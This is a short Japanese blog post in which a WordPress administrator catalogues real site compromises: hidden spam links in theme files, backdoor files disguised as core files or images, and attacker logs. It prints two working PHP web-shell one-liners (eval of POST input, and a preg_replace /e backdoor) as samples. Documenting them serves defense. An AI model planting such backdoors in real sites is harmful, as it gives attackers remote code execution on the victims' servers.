WordPress 改竄コレクション

数百のWordPressを見てくると当然改竄被害もよく見る。
仕事で見てるのは5年くらい?それ以前含めても自分が設置したWPではないのに他の人が設置すると高確率で被害にあって本当に謎すぎる…。

しばらくは初心者には難しいセキュリティ対策は控えてサーバー側で対策してたけどそれでは足りなくなって最近は遠慮なく本気でやってるので被害は出てない。

手元に残ってたファイルから改竄の実例を残す。

テーマ改竄

footer.phpに外部リンクが勝手に挿入されている。

<div style="position: absolute; top: -355px;left: -915px;"><a href="http://...">ルイヴィトンiphoneケース</a></div>

日本語だけどリンク先は台湾ドメインで犯人は謎…。
htmlだけで大したことないと思うなら違う。
不正にログイン成功されて管理画面からテーマ編集できてるのでこの時点でもう死んでる。
テーマ編集できるならPHPも使えるのでなんでもやられる。
改竄被害の原因のほとんどはブルートフォースアタックからの不正ログイン→管理画面からテーマやプラグインの編集。

昔から投稿でPHP使えるようにするプラグインは使うなと言われてる理由もこれ。何万回言っても使いたがる人は出てくるけど。

WP本体のファイルに偽装

不正ログインしてPHPが使えるようになったらどうするかというと
wp-admin/wp-includes/ 以下にファイルを作る。
素人が見てもまず気付かない。そもそも見ない。

wp-conf1g.phpreadme.php もあった。

気付かない所で攻撃してるので世の中のWPの大半は気付いてないだけですでに被害受けてると思っている。

PHPのようで画像のようでPHP

class-wp-user.php なんて名前でOSでプレビューすると画像だけど中身をよく見るとPHPコードが仕込まれてる。

<?php @eval($_POST[cmd]);?>

ログを残してる

log.htmltime.html があって前回のログを残してる。
ログを残すほど何度もやってきてる。

その他

具体的なコード書いても仕方ないしそんなに書ける例はなかった。
大体は外部から受け取ってるか

<?php if($_POST["reg"]<>""){@preg_replace("/[checksql]/e",$_POST['reg'],"saft");}?>

base64をdecodeして何か実行している。

[紹介元] WordPressタグが付けられた新着投稿 – Qiita WordPress 改竄コレクション

関連記事